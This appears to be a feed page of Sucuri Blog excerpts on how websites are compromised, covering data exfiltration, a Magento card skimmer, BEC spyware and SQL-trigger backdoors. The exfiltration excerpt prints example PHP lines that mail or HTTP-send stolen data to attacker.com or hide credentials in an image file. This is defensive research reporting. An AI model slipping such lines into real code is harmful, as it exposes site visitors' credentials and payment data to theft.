How Do Websites Get Hacked?

As much as the web has grown, surprisingly not a lot has changed in how websites get hacked.

The most important thing you can do in keeping the web – and your own sites and visitors – safe is to understand these unchanging truths and hold them close to heart.

Consider the Scale of Hacked Websites

1.2 billion sites make up today’s World Wide Web. Assuming a 3-second load time, continuous queries, and not a wink of rest, it’d take you over 160 years to just see every site that currently exists.

Continue reading How Do Websites Get Hacked? at Sucuri Blog.

Server Side Data Exfiltration via Telegram API

One of the themes commonly highlighted on this blog includes the many creative methods and techniques attackers employ to steal data from compromised websites. Credit card skimmers, credential and password hijackers, SQL injections, and even malware on the server level can be used for data exfiltration.

What’s more, attackers may be able to accomplish this feat with a few mere lines of code. For example:

Emailing the data:

@mail(“email@attacker.com”, $_SERVER[“SERVER_NAME”], $stolenData);

Writing the data to a local file:

fwrite($fh, $stolenData);

Sending the data to an email address under the attacker’s control:

@file_get_contents(“http://attacker.com/cgi-bin/optimus.pl?prime=$stolenData”);

Writing the data to an image file within the website to avoid raising suspicion:

$hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’);
$write=fwrite($hellowp,$username_password,$time);

Harvesting & Exfiltrating Stolen Data via Telegram

One interesting technique our team has come across in recent months leverages the Telegram API to exfiltrate stolen data and send it in a private message to a bot under the attackers control.

Continue reading Server Side Data Exfiltration via Telegram API at Sucuri Blog.

Magento 2 PHP Credit Card Skimmer Saves to JPG

Bad actors often leverage creative techniques to conceal malicious behaviour and harvest sensitive information from ecommerce websites.

A recent investigation for a compromised Magento 2 website revealed a malicious injection that was capturing POST request data from site visitors. Located on the checkout page, it was found to encode captured data before saving it to a .JPG file.

Malicious Injection Behavior

The following PHP code was found injected to the file ./vendor/magento/module-customer/Model/Session.php.

Continue reading Magento 2 PHP Credit Card Skimmer Saves to JPG at Sucuri Blog.

Trojan Spyware and BEC Attacks

When it comes to an organization’s security, business email compromise (BEC) attacks are a big problem. One primary reason impacts are so significant is that attacks often use a human victim to authorize a fraudulent transaction to bypass existing security controls that would normally be used to prevent fraud. Another reason is that social engineering lures may be expertly crafted by the attacker after they have been monitoring a victim’s activity for some time, resulting in more effective phishing campaigns with serious security implications.

Continue reading Trojan Spyware and BEC Attacks at Sucuri Blog.

SQL Triggers in Website Backdoors

Over the past year, there’s been an increasing trend of WordPress malware using SQL triggers to hide malicious SQL queries within compromised databases. These queries inject an admin level user into the infected database whenever the trigger condition is met.

What makes this especially problematic for website owners is that most malware cleanup guides focus on the website files and data within specific database tables  — for example, wp_users, wp_options, and wp_posts.

Continue reading SQL Triggers in Website Backdoors at Sucuri Blog.

Pin It on Pinterest